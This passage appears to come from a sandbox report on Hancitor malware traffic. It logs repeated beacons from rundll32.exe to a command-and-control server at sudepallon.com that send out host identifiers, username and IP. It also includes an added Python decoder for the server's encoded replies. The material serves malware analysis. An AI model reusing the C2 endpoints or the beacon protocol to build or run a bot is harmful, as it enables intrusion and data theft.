                              Data Ascii: c\r\nCMNXARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              54 | 192.168.2.3 | 49781 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:54.912456989 CEST | 5449 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.979643106 CEST | 5449 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 47 48 53 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nGHSTARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              55 | 192.168.2.3 | 49782 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:55.063107967 CEST | 5450 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:55.130027056 CEST | 5450 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 59 42 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nHYBSARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              56 | 192.168.2.3 | 49783 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:55.238332033 CEST | 5451 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:55.306139946 CEST | 5452 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 59 42 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nJYBQARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              57 | 192.168.2.3 | 49784 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:55.298197031 CEST | 5452 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:55.364835978 CEST | 5452 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nQZAJARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              58 | 192.168.2.3 | 49785 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:55.835835934 CEST | 5453 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:55.902894974 CEST | 5454 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:57 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 42 59 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nQBYJARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              59 | 192.168.2.3 | 49786 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:55.949904919 CEST | 5455 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:56.015496969 CEST | 5456 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:57 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nTKPGARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              6 | 192.168.2.3 | 49726 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:21.159641981 CEST | 670 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:21.228554964 CEST | 670 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:22 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: c\r\nNNMMARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              60 | 192.168.2.3 | 49787 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:55.950061083 CEST | 5455 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:56.015472889 CEST | 5455 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:57 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 41 46 55 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cAFUZARRABw==0
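The session above is one complete Hancitor exchange: a 121-byte form-encoded check-in (GUID, BUILD, INFO, EXT, IP, TYPE, WIN) and a 12-byte chunked reply. Every reply in this capture has a different first four characters (NNMM, AFUZ, JHSQ, ...) and the same tail ARRABw==, which is what a practitioner would want to decode. The following is an added example, not code from the Joe Sandbox report or from the malware. The four-character junk prefix and the XOR key 0x7A are taken from public Hancitor analyses, not from this page; that they fit can be checked against the page's own data, since every captured reply decodes to the same {n:} (the no-task answer in those analyses). Parsing several concatenated {cmd:arg} items is an assumption beyond what the page shows. The body uses the INFO value as the report's ASCII view renders it (computer\user); the raw hex carries the real hostname\user, which is what the Content-Length of 121 counts.

```python
"""Decode the Hancitor check-in and its chunked reply shown in the session above.

Added example; not code from the Joe Sandbox report or from the malware.
"""
import base64
import binascii
from urllib.parse import parse_qsl

# Check-in body as the report's ASCII view renders it (hostname\user redacted
# to computer\user by the sandbox; the raw hex carries the real value).
CHECKIN_BODY = ("GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\\user"
                "&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)")
# "Data Raw" of the 200 OK reply in session 60, copied verbatim from the report.
RESPONSE_RAW_HEX = "63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a"

XOR_KEY = 0x7A     # assumption from public Hancitor analyses, not from this page
JUNK_PREFIX = 4    # likewise: leading base64 characters the bot discards
EXPECTED_FIELDS = ["GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN"]


def parse_checkin(body):
    """Split the form-encoded check-in into an ordered field dict."""
    fields = dict(parse_qsl(body, keep_blank_values=True))
    if list(fields) != EXPECTED_FIELDS:
        raise ValueError(f"unexpected field layout: {list(fields)}")
    return fields


def dechunk(raw):
    """Reassemble a chunked HTTP body: hex size, CRLF, data, CRLF ... '0'."""
    out = bytearray()
    while True:
        size_line, sep, raw = raw.partition(b"\r\n")
        if not sep:
            raise ValueError("truncated chunked body")
        size = int(size_line.split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return bytes(out)
        out += raw[:size]
        raw = raw[size + 2:]                        # skip the data and its CRLF


def decode_response(body):
    """Drop the junk prefix, base64-decode, XOR every byte with the key."""
    plain = bytes(b ^ XOR_KEY for b in base64.b64decode(body[JUNK_PREFIX:]))
    if not plain.startswith(b"{"):
        raise ValueError(f"unexpected plaintext {plain!r}: key/prefix assumption is wrong")
    return plain.decode("ascii")


def parse_tasks(decoded):
    """'{n:}' -> [('n', '')]; handling of concatenated '{a:x}{b:y}' is assumed."""
    tasks = []
    for item in decoded.split("}"):
        item = item.strip()
        if not item:
            continue
        if not item.startswith("{") or ":" not in item:
            raise ValueError(f"malformed task {item!r}")
        cmd, _, arg = item[1:].partition(":")
        tasks.append((cmd, arg))
    return tasks


def decode_report_response(data_raw_hex):
    """Take the report's 'Data Raw' line through dechunk -> decode -> tasks."""
    body = dechunk(binascii.unhexlify(data_raw_hex.replace(" ", "")))
    return parse_tasks(decode_response(body))


if __name__ == "__main__":
    print(parse_checkin(CHECKIN_BODY))
    print(decode_report_response(RESPONSE_RAW_HEX))   # [('n', '')]: no task
```

Feeding any other reply from this capture (for example cZJQAARRABw==0, after restoring the CRLFs that the ASCII view drops) through decode_report_response gives the same no-task result; a non-"{" plaintext would mean the key or prefix assumption does not hold for the sample at hand.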


                              Session ID: 61 | Source: 95.213.179.67:80 | Destination: 192.168.2.3:49788 | Process: C:\Windows\SysWOW64\svchost.exe
                              Timestamp | kBytes transferred | Direction | Data
                              (no HTTP data recorded for this session)


                              Session ID: 62 | Source: 192.168.2.3:49789 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:56.281801939 CEST | 5458 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:56.350697041 CEST | 5459 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:57 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJHSQARRABw==0


                              Session ID: 63 | Source: 192.168.2.3:49790 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:57.506844044 CEST | 5459 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:57.572794914 CEST | 5460 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cZJQAARRABw==0


                              Session ID: 64 | Source: 192.168.2.3:49791 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:57.533869982 CEST | 5460 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:57.601253033 CEST | 5461 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cTZAGARRABw==0


                              Session ID: 65 | Source: 192.168.2.3:49792 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:57.860013962 CEST | 5461 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:57.924782038 CEST | 5462 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cZYBAARRABw==0


                              Session ID: 66 | Source: 192.168.2.3:49793 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:57.953269958 CEST | 5463 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.020178080 CEST | 5464 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 4d 4e 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cFMNUARRABw==0


                              Session ID: 67 | Source: 192.168.2.3:49794 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:57.962085962 CEST | 5463 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.030364037 CEST | 5464 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJHSQARRABw==0


                              Session ID: 68 | Source: 192.168.2.3:49795 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:58.261405945 CEST | 5465 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.330001116 CEST | 5466 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
